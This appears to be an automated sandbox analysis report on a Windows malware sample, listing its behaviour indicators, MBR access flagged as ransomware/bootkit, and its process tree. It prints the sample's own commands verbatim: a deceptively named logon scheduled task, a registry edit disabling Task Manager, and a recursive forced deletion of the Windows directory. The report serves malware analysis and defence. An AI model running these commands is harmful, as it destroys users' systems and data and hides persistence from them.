207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906

Analysis

max time kernel
82s
max time network
13s
resource
win7v191014

Sharing

Copy URL

Twitter E-mail

General

Target

207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906
Sample

191025-f6ttaqn6da
SHA256

207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906

Score

N/A

Malware Config

Signatures

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1312	207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe

Drops file in system dir 64 IoCs

description	ioc	pid	Process
File deleted	C:\Windows\DtcInstall.log	1920	cmd.exe
File deleted	C:\Windows\msdfmap.ini	1920	cmd.exe
File deleted	C:\Windows\PFRO.log	1920	cmd.exe
File deleted	C:\Windows\Professional.xml	1920	cmd.exe
File deleted	C:\Windows\setupact.log	1920	cmd.exe
File deleted	C:\Windows\setuperr.log	1920	cmd.exe
File deleted	C:\Windows\Starter.xml	1920	cmd.exe
File deleted	C:\Windows\system.ini	1920	cmd.exe
File deleted	C:\Windows\TSSysprep.log	1920	cmd.exe
File deleted	C:\Windows\win.ini	1920	cmd.exe
File deleted	C:\Windows\WindowsUpdate.log	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\adodb.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\__AssemblyInfo__.ini	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC\Extensibility\7.0.3300.0__b03f5f7f11d50a3a\extensibility.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC\Extensibility\7.0.3300.0__b03f5f7f11d50a3a\__AssemblyInfo__.ini	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC\Microsoft.Ink\1.0.2201.0__31bf3856ad364e35\Microsoft.Ink.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC\Microsoft.Ink\1.0.2201.0__31bf3856ad364e35\__AssemblyInfo__.ini	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC\Microsoft.Ink\1.7.2600.2180__31bf3856ad364e35\Microsoft.Ink.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC\Microsoft.Ink\1.7.2600.2180__31bf3856ad364e35\__AssemblyInfo__.ini	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\__AssemblyInfo__.ini	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.stdformat.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\__AssemblyInfo__.ini	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\msdatasrc.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\__AssemblyInfo__.ini	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\__AssemblyInfo__.ini	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\AuditPolicyGPManagedStubs.Interop\6.1.0.0__31bf3856ad364e35\AuditPolicyGPManagedStubs.Interop.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\BDATunePIA\6.1.0.0__31bf3856ad364e35\BDATunePIA.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\ehexthost32\6.1.0.0__31bf3856ad364e35\ehexthost32.exe	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\ehexthost32\6.1.0.0__31bf3856ad364e35\ehexthost32.exe.config	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\ISymWrapper\2.0.0.0__b03f5f7f11d50a3a\ISymWrapper.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\mcstoredb\6.1.0.0__31bf3856ad364e35\mcstoredb.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\Microsoft.GroupPolicy.AdmTmplEditor\6.1.0.0__31bf3856ad364e35\Microsoft.GroupPolicy.AdmTmplEditor.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\Microsoft.GroupPolicy.AdmTmplEditor.Resources\6.1.0.0_en_31bf3856ad364e35\Microsoft.GroupPolicy.AdmTmplEditor.Resources.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\Microsoft.GroupPolicy.Interop\2.0.0.0__31bf3856ad364e35\Microsoft.GroupPolicy.Interop.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\Microsoft.Ink\6.1.0.0__31bf3856ad364e35\Microsoft.Ink.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35\Microsoft.Interop.Security.AzRoles.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\Microsoft.Transactions.Bridge.Dtc\3.0.0.0__b03f5f7f11d50a3a\Microsoft.Transactions.Bridge.Dtc.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\Microsoft.VisualStudio.Tools.Applications.InteropAdapter\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualStudio.Tools.Applications.InteropAdapter.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\MSBuild\3.5.0.0__b03f5f7f11d50a3a\MSBuild.exe	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\MSBuild\3.5.0.0__b03f5f7f11d50a3a\msbuild.exe.config	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\big5.nlp	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bopomofo.nlp	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\ksc.nlp	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\normidna.nlp	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\normnfc.nlp	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\normnfd.nlp	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\normnfkc.nlp	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\normnfkd.nlp	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\prc.nlp	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\prcp.nlp	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\xjis.nlp	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\napcrypt\6.1.0.0__31bf3856ad364e35\NAPCRYPT.DLL	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\naphlpr\6.1.0.0__31bf3856ad364e35\NAPHLPR.DLL	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\Policy.1.0.Microsoft.Ink\6.1.0.0__31bf3856ad364e35\Policy.1.0.Microsoft.Ink.config	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\Policy.1.0.Microsoft.Ink\6.1.0.0__31bf3856ad364e35\Policy.1.0.Microsoft.Ink.dll	1920	cmd.exe
File deleted	C:\Windows\assembly\GAC_32\Policy.1.0.Microsoft.Interop.Security.AzRoles\6.1.7600.16385__31bf3856ad364e35\Microsoft.Interop.Security.AzRoles.config	1920	cmd.exe

Drops desktop.ini 1 IoCs

description	ioc	pid	Process
File deleted	C:\Windows\Fonts\desktop.ini	1920	cmd.exe

Drops Office document 3 IoCs

description	ioc	pid	Process
File deleted	C:\Windows\ShellNew\EXCEL12.XLSX	1920	cmd.exe
File deleted	C:\Windows\ShellNew\MSPUB.PUB	1920	cmd.exe
File deleted	C:\Windows\ShellNew\PWRPNT12.PPTX	1920	cmd.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1312	207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1400	conhost.exe
1112	conhost.exe
1104	conhost.exe
844	conhost.exe

Accessing to Master Boot Record (MBR) 1 TTPs 1 IoCs

ransomware bootkit

description	ioc	pid	Process
File opened for modification	\??\PhysicalDrive0	1312	207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1312 wrote to memory of 1456	1312	207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe	28
PID 1312 wrote to memory of 1816	1312	207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe	27
PID 1816 wrote to memory of 1984	1816	cmd.exe	32
PID 1312 wrote to memory of 1920	1312	207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe	34

C:\Users\Admin\AppData\Local\Temp\207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe
"C:\Users\Admin\AppData\Local\Temp\207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Accessing to Master Boot Record (MBR)
- Suspicious use of WriteProcessMemory
PID:1312

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1145494900162369655018148990691529387095-157741661026531389279276841363457141"
1⤵
- Suspicious use of SetWindowsHookEx
PID:1400

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /create /tn "WindowsUpdatev1" /tr "C:\Users\Admin\AppData\Local\Temp\207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe" /sc onlogon
1⤵
- Suspicious use of WriteProcessMemory
PID:1816

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
1⤵
PID:1456

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "9201826351812207032-1153075310-833623098-1725515642-36335303-1096284185994470168"
1⤵
- Suspicious use of SetWindowsHookEx
PID:1112

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1108052224-1798237979-2115346884148494273-10359282406001780152589749911201466850"
1⤵
- Suspicious use of SetWindowsHookEx
PID:1104

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "WindowsUpdatev1" /tr "C:\Users\Admin\AppData\Local\Temp\207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe" /sc onlogon
1⤵
PID:1984

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C del %systemroot% /F /S /Q
1⤵
- Drops file in system dir
- Drops desktop.ini
- Drops Office document
PID:1920

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-239608306-1709560228-1094254200-1555416916-9402214781034493218-1244256140518640572"
1⤵
- Suspicious use of SetWindowsHookEx
PID:844

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Additional techniques

Replay Monitor

Loading Replay Monitor...

Downloads